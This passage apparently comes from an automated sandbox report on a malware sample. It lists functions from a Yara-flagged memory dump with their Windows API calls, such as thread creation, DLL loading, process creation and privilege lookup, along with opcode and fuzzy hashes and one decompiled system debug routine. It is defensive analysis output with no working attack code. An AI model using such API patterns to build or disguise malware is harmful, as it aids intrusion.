                                      • Opcode Fuzzy Hash: 73986c5ecec8419a28994bef90c98c9af250ddfaefce8324c9abee58b35ae773
                                      • Instruction Fuzzy Hash: DA01F972AA033A77FB215A909C42FFE77189FA2B10F150114FF04BA0C0EAD4690246F5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01227253, Relevance: 3.0, APIs: 2, Instructions: 50threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 012272DA
                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 012272FB
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      • Opcode ID: 696b2eb48c6773cd72e064c654bd105c546deaeffb772062d5f941dda9f0e9dd
                                      • Instruction ID: ac32060b62ac49f5d647e65322fe713813867abd523cd2a25fda2a00e36441ef
                                      • Opcode Fuzzy Hash: 696b2eb48c6773cd72e064c654bd105c546deaeffb772062d5f941dda9f0e9dd
                                      • Instruction Fuzzy Hash: 7D01CD71A6023A76EB21A6945C02FBE771C5F61B11F150118FF04FA1C0DAD9690547F1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01229B40, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 01229BB2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction ID: 021b56cf090caa345ff6f0dc66db4b7a78c4aef59d2f79d9efa77ec446c0cf21
                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction Fuzzy Hash: BF010CB5D1020EBBDF10DBA4DC41FADB7789B54208F0041A5EA0897285F671E6548B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238960, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 012389B4
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateInternalProcess
                                      • String ID:
                                      • API String ID: 2186235152-0
                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction ID: cd0b2a5cfbf1dd584e7bba68d973c01f7ca18cb5a4f542cd663eca408d98affe
                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                      • Instruction Fuzzy Hash: 5001B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7240C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01237430, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0122CCF0,?,?), ref: 0123746C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                      • Instruction ID: 77fe42b38ea9e4d9b90540339b6ce2cb6a903d18ace19ca159f3d902f2fc7a49
                                      • Opcode Fuzzy Hash: 3d896b48f5ae3f61c940dbc0491d4aba50d9e38c85a04b8e2dcf38253628bd18
                                      • Instruction Fuzzy Hash: ECE06DB33902043AE62065A9AC02FA7B69CDBD1B21F54002AFB4DEA2C0D995F90142A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238A43, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0122CFC2,0122CFC2,?,00000000,?,?), ref: 01238A80
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: 1ddf838b8c5bdd4522c55dffe405d0bc595aaa02dcc824db0488fd9f29b686e0
                                      • Instruction ID: 4153dce65b74a54675873fc296e36ff8939403ecad75d8bdb9668503d68543cd
                                      • Opcode Fuzzy Hash: 1ddf838b8c5bdd4522c55dffe405d0bc595aaa02dcc824db0488fd9f29b686e0
                                      • Instruction Fuzzy Hash: 80F0A0B26502056FCB10CF54CC40EE73BA8EF89210F148269FA4C9B342C631E812CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01237432, Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0122CCF0,?,?), ref: 0123746C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 948b98ecc13716179a12d50c1ffe524c5dd9f8e9f762166340a6fb15000a837c
                                      • Instruction ID: 81a0a6cc998276179cacea299815397f1cf6f806e6db270274a82a02ad44156c
                                      • Opcode Fuzzy Hash: 948b98ecc13716179a12d50c1ffe524c5dd9f8e9f762166340a6fb15000a837c
                                      • Instruction Fuzzy Hash: 0EE04FB33902003AE63065989C02FB776A89BE1B20F550129F749AB2C0D9A5F90142A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 012388B0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(01233536,?,01233CAF,01233CAF,?,01233536,?,?,?,?,?,00000000,00000000,?), ref: 012388DD
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction ID: 9d305314e54f226c101f0554a3f797b867c2427ac0832cc486c7d17ef0c1d2c5
                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                      • Instruction Fuzzy Hash: 02E046B1210208ABDB14EF99CC44EA777ACEF88754F118558FE086B241C670F910CBF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01238A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                      Download Yara Rule
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0122CFC2,0122CFC2,?,00000000,?,?), ref: 01238A80
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction ID: 559eea013e97a052964535b4605084622c081ec259df6596f372953c51f23963
                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                      • Instruction Fuzzy Hash: 8FE01AB16002086BDB10DF49CC84EE737ADAF89650F018154FA0867241C970E910CBF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0122D42D, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,?,01227C83,?), ref: 0122D45B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: 1e39a7dfad0cba014391f5e4f9b757d191df75e2471bc9af1caec5fdc882158f
                                      • Instruction ID: ac3ede0647ee48b4d08f5b6442da25cf4770516a634fb8fd70e91664fb2f42ca
                                      • Opcode Fuzzy Hash: 1e39a7dfad0cba014391f5e4f9b757d191df75e2471bc9af1caec5fdc882158f
                                      • Instruction Fuzzy Hash: 2AD05E956B838529F711EAF81D02F572B848B22A80F0A46A9E68DEA183D94CC0198236
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0122D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNELBASE(00008003,?,?,01227C83,?), ref: 0122D45B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorMode
                                      • String ID:
                                      • API String ID: 2340568224-0
                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                      • Instruction ID: cb3949fcd52db40d41263f479d6f819a747d20cef63100e2dbc2c9b83388724b
                                      • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                      • Instruction Fuzzy Hash: 3CD05E727603093AF610EAA89C02F663288AB55A40F494064FA48962C3D954E5008161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01229B33, Relevance: 1.5, APIs: 1, Instructions: 11libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 01229BB2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 16b38af5867c66ab1e7e91376a446ab78951f754c75f44e95e777516efec77ce
                                      • Instruction ID: 19000661dca39ecb8e58abd44e73962e86d03050274e449edc724a419a29c0bf
                                      • Opcode Fuzzy Hash: 16b38af5867c66ab1e7e91376a446ab78951f754c75f44e95e777516efec77ce
                                      • Instruction Fuzzy Hash: 5DC02B3DF4C26436DF50C2846C42B0CF700CBC8902F9900CDED2CD7181D8A30050C241
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0545967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5a2efec5fcceaa2f76077a3787b7f878141282966c264ac6225a97e93a7f8d10
                                      • Instruction ID: 36b5d60a8956d79581bb6e4806d44598e5eca9b425d0ae9a0c43ea53b9c5072f
                                      • Opcode Fuzzy Hash: 5a2efec5fcceaa2f76077a3787b7f878141282966c264ac6225a97e93a7f8d10
                                      • Instruction Fuzzy Hash: 6AB09B71D014C5C5D611D7614608B67795177D0751F56C053D1020751B4778C095F5B6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 012388E2, Relevance: 1.5, APIs: 1, Instructions: 7memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,01223B93), ref: 0123891D
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, Offset: 01220000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: b34ca87abdfd35ad9b3096aae483e43e2667321c0023c43430d5e21255cd8d86
                                      • Instruction ID: cb0a8d370e49c6c2ab7a01d06fd338434e541bb9219615c6c672a92585e4159d
                                      • Opcode Fuzzy Hash: b34ca87abdfd35ad9b3096aae483e43e2667321c0023c43430d5e21255cd8d86
                                      • Instruction Fuzzy Hash: 88A002BA16C018569D4175D53D065B5720C88C41A92014562E10D455010547615A4972
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 054AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 53%
                                      			E054AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0545CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E054A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E054A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                      0x054afdda
                                      0x054afde2
                                      0x054afde5
                                      0x054afdec
                                      0x054afdfa
                                      0x054afdff
                                      0x054afe0a
                                      0x054afe0f
                                      0x054afe17
                                      0x054afe1e
                                      0x054afe19
                                      0x054afe19
                                      0x054afe19
                                      0x054afe20
                                      0x054afe21
                                      0x054afe22
                                      0x054afe25
                                      0x054afe40

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 054AFDFA
                                      Strings
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054AFE2B
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054AFE01
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.567946255.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                                      • Associated: 00000006.00000002.568362135.000000000550B000.00000040.00000001.sdmp Download File
                                      • Associated: 00000006.00000002.568376162.000000000550F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 519200b3243861486e0cffdb645350edda9c5e4e5730e1434ddb3fff4aa1d530
                                      • Instruction ID: 6060d282b4100ad26dc00b8b2ecd5856ddc08c5b773f19d901459746b84be046
                                      • Opcode Fuzzy Hash: 519200b3243861486e0cffdb645350edda9c5e4e5730e1434ddb3fff4aa1d530
                                      • Instruction Fuzzy Hash: 3BF0FC372442017FDB211A45DC49FB3BF6AEB54730F240316F628595D1E972F82096F4
                                      Uniqueness

                                      Uniqueness Score: -1.00%